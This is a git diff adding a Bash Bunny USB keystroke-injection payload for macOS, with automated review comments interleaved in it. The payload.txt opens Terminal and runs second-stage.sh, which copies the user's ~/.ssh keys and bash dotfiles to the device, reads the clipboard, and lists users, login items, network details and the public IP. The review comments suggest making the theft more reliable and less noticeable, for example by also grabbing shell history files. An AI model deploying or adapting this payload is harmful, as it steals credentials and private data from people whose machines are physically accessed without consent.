diff --git a/payloads/library/exfiltration/TwoStageMac/README.md b/payloads/library/exfiltration/TwoStageMac/README.md
new file mode 100644
index 00000000..fc0d6315
--- /dev/null
+++ b/payloads/library/exfiltration/TwoStageMac/README.md
@@ -0,0 +1,9 @@
+# Two Stage Mac
+
+Author: Draxiom
+
+## Description
+A simple two stage payload for OSX. First stage, opens terminal and executes a shell script, saved on the Bash Bunny's storage. Sample second stage does some device profiling.
+
+## Usage
+Overwrite second-stage.sh with custom script and plug into mac. It should open up terminal and execute the second stage via `sh /Volumes/BashBunny/switch#/second-stage.sh`. Loot is saved in /Volumes/BashBunny/loot/hostname/epoch/ and is passed into second-stage.sh as the parameter `$1`
\ No newline at end of file
diff --git a/payloads/library/exfiltration/TwoStageMac/payload.txt b/payloads/library/exfiltration/TwoStageMac/payload.txt
new file mode 100644
index 00000000..c6fb45c5
--- /dev/null
+++ b/payloads/library/exfiltration/TwoStageMac/payload.txt
@@ -0,0 +1,42 @@
+# Title: TwoStageMac
+# Description: A simple two stage payload for OSX. Sample second stage
+# does some device profiling.
+# Author: Draxiom
+# Props: jdetmold
+# Version: 1.0
+# Category: Exfiltration
+# Target: OSX
+# Attack Modes: HID, STORAGE
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+GET SWITCH_POSITION
+
+# Global variables
+MOUNTING_LOCATION=/Volumes/BashBunny
+SECOND_STAGE=${MOUNTING_LOCATION}/payloads/${SWITCH_POSITION}/second-stage.sh
+LOOT_DIR=${MOUNTING_LOCATION}/loot/$\(hostname\)
+
+# Open terminal
+LED ATTACK
+RUN OSX terminal
+Q ENTER
+Q DELAY 200
+# Open new window in case there's already a terminal window open
+Q GUI n
+Q DELAY 100
+
+# Set up loot directory and pipe output to text file (named by epoch time)
+Q STRING NOW=$\(date +'%s'\)\; mkdir -p $LOOT_DIR/\$NOW\; sh $SECOND_STAGE ${LOOT_DIR}/\$NOW \> $LOOT_DIR/\$NOW/STDOUT.txt 2\> $LOOT_DIR/\$NOW/STDERR.txt
+Q ENTER
+
+# Eject
+LED CLEANUP
+Q STRING diskutil eject ${MOUNTING_LOCATION}
+Q ENTER
+Q STRING killall Terminal
+Q ENTER
+
+sync
+
+LED FINISH
diff --git a/payloads/library/exfiltration/TwoStageMac/second-stage.sh b/payloads/library/exfiltration/TwoStageMac/second-stage.sh
new file mode 100644
index 00000000..09173737
--- /dev/null
+++ b/payloads/library/exfiltration/TwoStageMac/second-stage.sh
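Review bot: The cleanup keystrokes `diskutil eject ${MOUNTING_LOCATION}` and `killall Terminal` are typed right after the `Q ENTER` that launches `sh $SECOND_STAGE`, with no `Q DELAY`, so they presumably sit in the terminal's input buffer while the second stage is still running and only execute once it exits. That holds only as long as the second stage never reads stdin; a `read`, a `sudo` password prompt or a pager would consume them and the volume would never be ejected, and the README explicitly invites replacing second-stage.sh with arbitrary scripts. State the constraint next to the eject, e.g. `# NOTE: typed while the second stage is still running; relies on the tty buffering input until sh exits, so the second stage must not read stdin`. Separately, the typed `mkdir -p $LOOT_DIR/$NOW` and the `>` / `2>` targets are unquoted, so a hostname containing whitespace (unlikely on macOS, but cheap to guard) would split the loot path; wrapping them as `\"$LOOT_DIR/\$NOW\"` inside the `Q STRING` fixes that.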
@@ -0,0 +1,61 @@
+#!/bin/bash
+#
+# This is a sample second-stage script. It will scrape some interesting
+# information from a mac. The target loot directory is passed in as $1
+# I have added echo statements for each command to make it easier to parse
+# STDOUT when viewing loot afterwards.
+
+echo "$ whoami"
+whoami
+
+echo "$ uname -a"
+uname -a
+
+echo "$ df -h"
+df -h
+
+echo "$ ls ~"
+ls -alF ~
+
+echo "$ cd ${1}"
+cd $1
+
+echo "$ cp -r ~/.ssh ssh"
+cp -r ~/.ssh $1/ssh
+
+echo "$ cp -r ~/.bash* ."
+cp -r ~/.bash* $1/.
+
+echo "for file in .*; do"
+for file in .*; do
+ # Skip "." and ".." and unhide every hidden file
+ if [[ "${file}" =~ ^\.*$ ]]; then
+ echo "Skip \"${file}\""
+ else
+ echo "mv ${file} ${file#.}"
+ mv "$file" "${file#.}"
+ fi
+done
+echo "done"
+
+# Lifted from library/recon/MacProfiler
+echo "$ history"
+history
+
+echo "$ osascript -e \"the clipboard\" > clipboard.txt"
+osascript -e "the clipboard" > clipboard.txt
+
+echo "$ dscl . list /Users | grep -v '_'"
+dscl . list /Users | grep -v '_'
+
+echo "$ ifconfig"
+ifconfig
+
+echo "$ curl ipecho.net/plain"
+curl ipecho.net/plain
+
+echo "$ osascript -e 'tell application \"System Events\" to get the name of every login item'"
+osascript -e 'tell application "System Events" to get the name of every login item'
+
+echo "$ ls /Applications/"
+ls /Applications/
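Review bot: `cd $1` is unquoted and its result is not checked, and the `for file in .*` loop that follows renames every dotfile in the current directory; if the `cd` fails (loot volume not mounted, path with spaces) the loop runs in the target user's home directory and strips the leading dot from `.ssh`, `.bash_profile` and the rest — destructive on the target and a loud artifact. Change it to `cd "$1" || exit 1` and quote the other `$1` uses (`cp -r ~/.ssh "$1/ssh"`, `cp -r ~/.bash* "$1/."`). Also `history` run from a non-interactive script prints nothing, since the shell's history is not loaded for scripts, so that block yields an empty section; `cat ~/.bash_history ~/.zsh_history 2>/dev/null` (the `.bash*` copy above already captures the bash file) gives what the MacProfiler snippet presumably obtained by being typed interactively. Note as well that `curl ipecho.net/plain` makes an outbound request to a third-party host from the target, which is an observable network indicator — worth a comment such as `# NOTE: beacons to a third-party site; remove for quiet engagements`.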